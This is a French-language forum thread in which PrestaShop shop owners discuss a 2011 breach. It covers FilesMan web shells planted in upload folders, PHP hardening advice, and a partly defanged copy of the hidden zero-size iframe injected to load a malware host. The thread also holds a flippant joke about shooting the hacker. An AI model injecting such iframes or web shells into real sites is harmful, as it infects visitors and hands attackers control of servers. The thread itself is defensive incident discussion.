DevNet Posted August 24, 2011 Share Posted August 24, 2011 "Bah j espère que ça peut attendre encore quelques jours et ne pas faire trop de dégâts ..." demande à la team.. ils sont peut être capable de te corriger ça sans que tu communiques tes infos Pas vraiment. En fait ils sont en mesure de tout faire sur nos boutiques, dès lors qu'on charge l'index du back-office. C'est ce qui s'est passé pour la propagation du "virus". Il suffisait aux administrateurs des boutiques de ne pas accéder à leur back-office hier soir ou ce matin pour ne pas être infecté. Mais on sait maintenant, que PrestaShop est en mesure (bon gré mal gré) d'injecter ce qu'il veut à distance dès lors que vous chargez une page de votre boutique qui track un de leur service. Ce "virus" montre une vulnérabilité certainement corrigée sur les "webservices" centralisés de PrestaShop. Si tous ces trackers restent dans le code du noyau de chacune de nos boutiques, alors j'espère que la team sera très très très vigilante avec leur propre sécurité. 1 Link to comment Share on other sites More sharing options...
Leguman Posted August 24, 2011 Share Posted August 24, 2011 J'ai beau installer le fichier et l’exécuter, j'ai bien un OK mais après visite, je continue à avoir une alerte CHEVAL de Troie d'Avast ! Que faire ? Merci pour votre aide. Link to comment Share on other sites More sharing options...
SIP-Online Posted August 24, 2011 Share Posted August 24, 2011 Bonjour à tous, (Ca fait longtemps que je ne suis plus venu ici, mais rien de tel qu'un faille de sécurité pour faire un Comeback ) Ne recevant pas de réponse, et ayant plusieurs dizaines de sites touchés par cette faille (donc la plupart se sont fait hacker hier et aujourd'hui), je me suis mis moi même à chercher à la corriger . Comme l'a dis Jeckyl, après analyse, les fichiers ".php" qui se trouvent dans vos dossier "upload" et "download" sont des Files Manager (du nom de FilesMan, connu dans le monde du hack). Merci donc de les supprimer au plus vite... En effet le hacker peut via un mot de passe (très facile à trouver d'ailleurs) accéder à tous vos fichiers. De plus, si votre serveur n'est pas totalement sécurisé, les dégâts pourrait être bien pire que ce qu'il y a dans le footer . Voici une image pour vous montrer ce que cela donne Bonsoir Pierre-Yves, sur votre Screenshot il y a en partie une chose qui m’interpelle c’est votre SafeMode qui est désactivé, je suppose aussi que votre open_basedir et autre paramètres de PHP ne sont pas personnalisé. C’est malheureusement ce que je vois très souvent sur les serveurs que j’interviens et à laquelle rien n’est sécurisé, si vous avez quelqu’un dans votre entourage qui peut personnaliser cela demandez-lui de faire un contrôle complet de votre serveur pour y installer des modules apache et autre services qui permettrons de vous protégez contre les différents attaques connu de nos jours. Pour ma par Modsecurity 2 à bien fait son travail ainsi que d’autre services web sur mes serveurs mutualisé et dédié pour mes clients ! Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 J'ai beau installer le fichier et l’exécuter, j'ai bien un OK mais après visite, je continue à avoir une alerte CHEVAL de Troie d'Avast ! Que faire ? Merci pour votre aide. La fix est pour votre site pas pour votre ordinateur, il faut éradiquer le cheval différemment, mais je laisse le soin au PCistes de vous répondre. Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Bonjour à tous, (Ca fait longtemps que je ne suis plus venu ici, mais rien de tel qu'un faille de sécurité pour faire un Comeback ) Ne recevant pas de réponse, et ayant plusieurs dizaines de sites touchés par cette faille (donc la plupart se sont fait hacker hier et aujourd'hui), je me suis mis moi même à chercher à la corriger . Comme l'a dis Jeckyl, après analyse, les fichiers ".php" qui se trouvent dans vos dossier "upload" et "download" sont des Files Manager (du nom de FilesMan, connu dans le monde du hack). Merci donc de les supprimer au plus vite... En effet le hacker peut via un mot de passe (très facile à trouver d'ailleurs) accéder à tous vos fichiers. De plus, si votre serveur n'est pas totalement sécurisé, les dégâts pourrait être bien pire que ce qu'il y a dans le footer . Voici une image pour vous montrer ce que cela donne Bonsoir Pierre-Yves, sur votre Screenshot il y a en partie une chose qui m’interpelle c’est votre SafeMode qui est désactivé, je suppose aussi que votre open_basedir et autre paramètres de PHP ne sont pas personnalisé. C’est malheureusement ce que je vois très souvent sur les serveurs que j’interviens et à laquelle rien n’est sécurisé, si vous avez quelqu’un dans votre entourage qui peut personnaliser cela demandez-lui de faire un contrôle complet de votre serveur pour y installer des modules apache et autre services qui permettrons de vous protégez contre les différents attaques connu de nos jours. Pour ma par Modsecurity 2 à bien fait son travail ainsi que d’autre services web sur mes serveurs mutualisé et dédié pour mes clients ! Bonjour, Juste pour vous faire remarquer que si PY (Pierre-Yves) a su décrypter les script du hacker, il ne devrait pas avoir de soucis pour sécuriser son serveur surtout que je crois que son dernière employeur était un hébergeur ;-) Mais c'est toujours gentil de proposer, même si là il l'a fait sur un serveur local pour en pas risquer de faire de bêtises ;-) Link to comment Share on other sites More sharing options...
Eolia Posted August 24, 2011 Share Posted August 24, 2011 Quelle violence dans tous ces propos ! Vous vous dites tous commerçants, vous parlez de perte de chiffre et autres clients et vous reprochez aux membres de la Team de vous offrir un produit gratuit qui devrait être parfait et qui ne l'est pas encore! L’équipe de Prestashop "impose" une pub dans le BO (mais n'importe qui peut facilement supprimer quelques lignes dans le fichier ajax.php du répertoire admin pour ne plus se sentir sous le réseau Echelon...) pour elle aussi vivre de son produit. Elle ne vous impose pas un bandeau publicitaire sur votre page d'accueil comme le font certains prestataires gratuits que je sache. Je trouve déplorable de voir qu'une poignée de créateurs qui ONT RAISON d'être fier d'avoir permis la création de + de 80 000 boutiques GRATUITEMENT se voient critiqués pour un problème de faille sécuritaire (pas évident à trouver par ailleurs). Je suis dans une entreprise où travaillent en permanence une équipe de surveillance informatique pour tracker et contrer toutes les attaques, virus et autres trojans et je vous assure que ce n'est pas gratuit ni reposant! C'est en continuant ce genre de posts ni constructifs, ni encourageants que vous arriverez à faire disparaitre l'Open Source. Pourquoi continuer à se fatiguer pour des commerçants qui exigent de pouvoir gagner de l'argent avec un produit qu'il n'ont pas payé et qui ne supportent pas la moindre erreur ? Je reste admiratif devant le travail de la Team, sa rapidité à gérer le problème et ses nouvelles versions toujours plus innovantes. Mesdames et Messieurs de la PrestaTeam : MERCI Eolia 3 Link to comment Share on other sites More sharing options...
Fluorite Posted August 24, 2011 Share Posted August 24, 2011 Bonsoir Hum je voudrais pas déterrer un vieux Topic qui Date de mon inscription sur la Team Prestashop, ou cela avais pas mal fait de polémique, et je ne reviendrais pas sur les faits en relisant certain post, pour en avoir pris pas mal sur la tronche... C'est vraiment dommage de la part de prestashop, mais à mon sens! puisque vous avez découvert le pirate il serait bien de faire sortir son Nom? Posted Today, 01:08 PMOn a trouvé le hacker, et on lui a mis deux balles dans la nuque, radicale mais efficace Il y'a quand même des boutiques qui ont était touché et je ne rappellerais pas les lois sur le piratage et tout le blablabla. M'enfin si le jeu continue ça va causer pas mal de tort un jour ou l'autre? et ce serait vraiment dommage. Bonne soirée Yannick 1 Link to comment Share on other sites More sharing options...
SIP-Online Posted August 24, 2011 Share Posted August 24, 2011 Bonjour à tous, (Ca fait longtemps que je ne suis plus venu ici, mais rien de tel qu'un faille de sécurité pour faire un Comeback ) Ne recevant pas de réponse, et ayant plusieurs dizaines de sites touchés par cette faille (donc la plupart se sont fait hacker hier et aujourd'hui), je me suis mis moi même à chercher à la corriger . Comme l'a dis Jeckyl, après analyse, les fichiers ".php" qui se trouvent dans vos dossier "upload" et "download" sont des Files Manager (du nom de FilesMan, connu dans le monde du hack). Merci donc de les supprimer au plus vite... En effet le hacker peut via un mot de passe (très facile à trouver d'ailleurs) accéder à tous vos fichiers. De plus, si votre serveur n'est pas totalement sécurisé, les dégâts pourrait être bien pire que ce qu'il y a dans le footer . Voici une image pour vous montrer ce que cela donne Bonsoir Pierre-Yves, sur votre Screenshot il y a en partie une chose qui m’interpelle c’est votre SafeMode qui est désactivé, je suppose aussi que votre open_basedir et autre paramètres de PHP ne sont pas personnalisé. C’est malheureusement ce que je vois très souvent sur les serveurs que j’interviens et à laquelle rien n’est sécurisé, si vous avez quelqu’un dans votre entourage qui peut personnaliser cela demandez-lui de faire un contrôle complet de votre serveur pour y installer des modules apache et autre services qui permettrons de vous protégez contre les différents attaques connu de nos jours. Pour ma par Modsecurity 2 à bien fait son travail ainsi que d’autre services web sur mes serveurs mutualisé et dédié pour mes clients ! Bonjour, Juste pour vous faire remarquer que si PY (Pierre-Yves) a su décrypter les script du hacker, il ne devrait pas avoir de soucis pour sécuriser son serveur surtout que je crois que son dernière employeur était un hébergeur ;-) Mais c'est toujours gentil de proposer, même si là il l'a fait sur un serveur local pour en pas risquer de faire de bêtises ;-) C’est ce Backdoor trouver (peut-être) sur son site et ce floutage au niveau de l'IP qui ma inciter à poster ce message, on va dire qui serra adresser à d'autre personne alors. Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 l'alerte de awast ou chez moi de malwarebytes est le lien du clickmemk fileave com adresse IP 64 62 181 43 On voit le lien en iframe avec firburg : iframe width="0" height="0" src="http ://clickmema fileave com" html xmlns="http ://www.w3 org/ 1999/xhtml" head/headbodypre /pre/body /iframe J'ai ôter les <> et les . Link to comment Share on other sites More sharing options...
Recommended Posts